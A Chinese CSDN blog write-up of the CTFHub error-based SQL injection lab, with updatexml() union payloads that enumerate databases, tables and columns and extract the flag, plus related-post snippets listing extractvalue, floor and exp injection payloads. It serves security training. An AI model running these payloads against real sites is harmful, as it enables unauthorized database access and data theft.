【ctfhub】SQL注入报错注入

已于 2022-10-08 21:48:08 修改
阅读量302 收藏 1
点赞数
分类专栏: ctf 文章标签: sql 网络安全 web安全
于 2022-10-08 15:20:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/manerzi/article/details/127208940
版权

题目描述:

在这里插入图片描述我们输入1
在这里插入图片描述得到查询正确
我们再输入1`试试
在这里插入图片描述

给出了报错内容,并且标明了错误点是`

然后我们利用sql函数进行查询

-1 union select updatexml(1,concat('~', substr((select group_concat(schema_name) from information_schema.schemata),1,31) ),1)

-1 union select updatexml(1,concat('~', substr((select group_concat(schema_name) from information_schema.schemata),30,31) ),1)

在这里插入图片描述在这里插入图片描述

库名为 sqli
查询表名

-1 union select updatexml(1,concat('~', substr((select group_concat(table_name) from information_schema.tables where table_schema='sqli'),1,31) ),1)

在这里插入图片描述
查询列名

-1 union select updatexml(1,concat('~', substr((select group_concat(column_name) from information_schema.columns where table_schema='sqli'  && table_name='flag'),1,31) ),1)

在这里插入图片描述
查询字段

-1 union select updatexml(1,concat('~', substr((select group_concat(flag) from flag),1,31) ),1)

-1 union select updatexml(1,concat('~', substr((select group_concat(flag) from flag),20,31) ),1)

在这里插入图片描述
在这里插入图片描述得到flag

ctfhub{455aa3bdb68aebab7571a24c}

蔓蔓的学习记录
关注
专栏目录
[ctf web]sql报错注入
qq_37301470的博客
11-12 318
报错注入 一: exp,pow溢出报错 exp(int) 返回e的x次方 exp(~(select * from (select user())a)) ~:取反运算符 将字符串处理后变为大整数,报错 exp(710):报错 exp(709):不报错 绕过if,case的过滤进行基于报错的布尔盲注。 pow(int,int) 返回x的y次方 数值过大报错 pow(1+(sql表达式),99999999999999) 若sql语句为假则不报错 为真则报错 二:XML和Xpath基础 XML:标记
CTFHUB-web-SQL注入
ookami6497的博客
11-29 847
CTFHUB SQL
CTFHUB-SQL注入-报错注入
m0_64180167的博客
11-29 899
报错注入是在网站提供查询时进行SQL注入在用户输入了错误的信息时 网站进行报错处理但是提交的不进行审查 就会让代码随着报错指令进入目录。
CTFHub---SQL注入
最新发布
weixin_53736204的博客
07-28 608
1.输入1发现有两个回显,那么直接查库2.查表3.查flag表的字段名4.查表数据。
SQL注入学习记录 CTFHub SQL注入 报错注入
qq_45653588的博客
05-25 807
报错注入 报错注入在没法用union联合查询时用,但前提还是不能过滤一些关键的函数。 报错注入就是利用了数据库的某些机制,人为地制造错误条件,使得查询结果能够出现在错误信息中。 write up 打开页面后还是熟悉的界面,输入1后提示我们查询正确: 然后输入1': 爆出了错误,并且将错误回显在了页面上,我们这里可以使用updatexml()报错注入来获取我们想要的信息。 输入1 union select updatexml(1,concat(0x7e,database(),0x7e),1);,页面报错:
CTFHUB——SQL 报错注入三种方法全解
wuuconix's blog
08-25 3276
背景 Sql注入主要有三种方法,extractvalue和updatexml函数形成的xpath报错,这算两种。还有一种就是floor实现的group by主键重复,这算另外一种。 本篇文章将对CTFHUB中的SQL报错注入题目从头到尾对这三种方法进行实践。 利用extractvalue来xpath报错。 1 and (select extractvalue(1, concat(0x7e, (select database())))) 1 and (select extractvalue(1, conc
CTFHub SQL注入
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
02-09 1139
ctfhubSQL注入中的flag是动态生成的 1、整数型注入 1、按照提示输入1 发现直接给出了SQL语句,根据给出的SQL语句可以判断出直接使用联合查询即可 2、先使用order by判断字段数 首先使用order by 3 ,页面无回显,改为2之后页面显示正确。因此判断当前数据库当前表,共有2个字段。 3、使用联合查询,判断页面显示位 首先将id改为一个不存在的纸,根据联合查询的特性,就会返回11111,222222然后显示在页面上。 4、查询数据库版本 5、查询当前数据库 6、查询所有数
CTFHub——SQL注入
Aquarius_ego的博客
05-05 1739
CTFHub——SQL注入报错注入、布尔盲注、时间盲注、MySQL结构、Cookie注入、UA注入、Refer注入、过滤空格)
Ctfhub解题 web SQL注入(全部完整版)
weixin_46703850的博客
03-15 5545
Ctfhub解题 web SQL注入
sql注入基础(ctfhub sql注入
kofi的博客,已停更
08-15 790
(持续更新中)sql注入基础0x00 前言 0x00 前言 这两天在CTFHub上练题,刚好练到了SQL注入这个之前我一直也不是很懂,这回一做发现其中大有玄妙,所以就一起写个小总结。 CTFhHub:https://www.ctfhub.com/#/index 上面这张图是CTFHubSQL注入技能树 ...
ctf小经验sql注入
04-11
sql注入一、找到注入点; 二、判断当前表的字段; 三、用联合语句查看哪几位是有效位; 四、查看当前数据库中有哪些表; 五、查看表中有哪些属性;
CTFHUB-WEB-SQL注入-报错注入
weixin_43486981的博客
08-10 782
报错注入就是利用了数据库的某些机制,人为地制造错误条件,使得查询结果能够出现在错误信息中。 题目: 靶机环境:输入1时,显示正确 输入一个随意的字符串后,显示错误。 求数据库名:输入1 union select updatexml(1,concat(0x7e,database(),0x7e),1);,页面报错: 求表名:输入1 union select updatexml(1,concat(0x7e, (select(group_concat(table_name))from information
CTFHub:web前置技能-SQL注入-报错注入
wdnmddbl的博客
06-13 997
路漫漫其修远兮,吾将上下而求索。本文涉及以下知识点,去引用文章学习即可:链接:我是一个知识点链接:我是一个知识点链接:我是一个知识点文章总结有我个人总结的一些知识点,希望对你有所帮助。练习sql注入,推荐使用sql-labs这个靶场,我后续也会更新从开始搭建到攻略1-75关完整教程,早些关注上车哦。sql注入基本语句基于报错的SQL盲注 - 报错回显(强制性报错 )updatexml():从目标XML中更改包含所查询值的字符串。
CTFHub | 报错注入
尼泊罗河伯的博客
10-28 2634
因为报错注入的语句比较多,测试了几个语句发现 extractvalue 语句存在 SQL 报错注入漏洞,得到数据库名称 sqli 后,查询数据库表名,发现一个可疑表名 flag 。检查这个 flag 表中的列,发现一个列名为 flag ,查询数据发现此题 flag 。发现数据不完整,使用 mid 函数进行查询从字符 2 开始得到完整数据。
CtfhubSQL注入|SQL报错注入及原理详解
tempulcc的博客
10-10 1527
手工测试sql注入及原理1、SQL 整数型注入查数据库名查数据表查flag表字段2、字符型注入3、报错注入updatexml() 函数致MYSQL显错注入原理updatexml() 函数定义updatexml() 函数运行机制updatexml() 函数运行示例不报错示例构造报错利用updatexml()测试ctfhub的显错注入 1、SQL 整数型注入 查数据库名 -1 union select group_concat(schema_name),2 from information_schema.sch
sql注入报错注入-ctf
时光凉春衫薄的博客
08-11 246
找数据库 ?id=1' union SELECT null,count(*),concat((select database()),floor(rand()*2))as a from information_schema.tables group by a%23 获取表名 ?id=1' union SELECT null,count(*),concat((select table_name from information_schema.tables where table_schema='secur
报错注入常见函数原理
p_utao的博客
11-04 682
floor函数 select count(*),(floor(rand(0)*2))x from table group by x; select查询语句 group by进行分组(相同为一组) rand()生成0到1的随机数 floor()返回整数 count()对数据整合(类似去重) 产生原因:mysql在执行该语句会建立一个虚拟表,表中有两个字段(一个是分组的值和一个计数的值),当分组已经存在后就会爆错。 参考:http://www.cnblogs.com/sfriend/p/11365999.ht
ctfhub sql注入
10-09
CTFHub是一个CTF(Capture The Flag)竞赛平台,其中包含了各种类型的安全挑战,包括SQL注入SQL注入是一种常见的Web应用程序安全漏洞,攻击者可以利用它来绕过应用程序的身份验证、访问未授权的数据或执行恶意操作...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值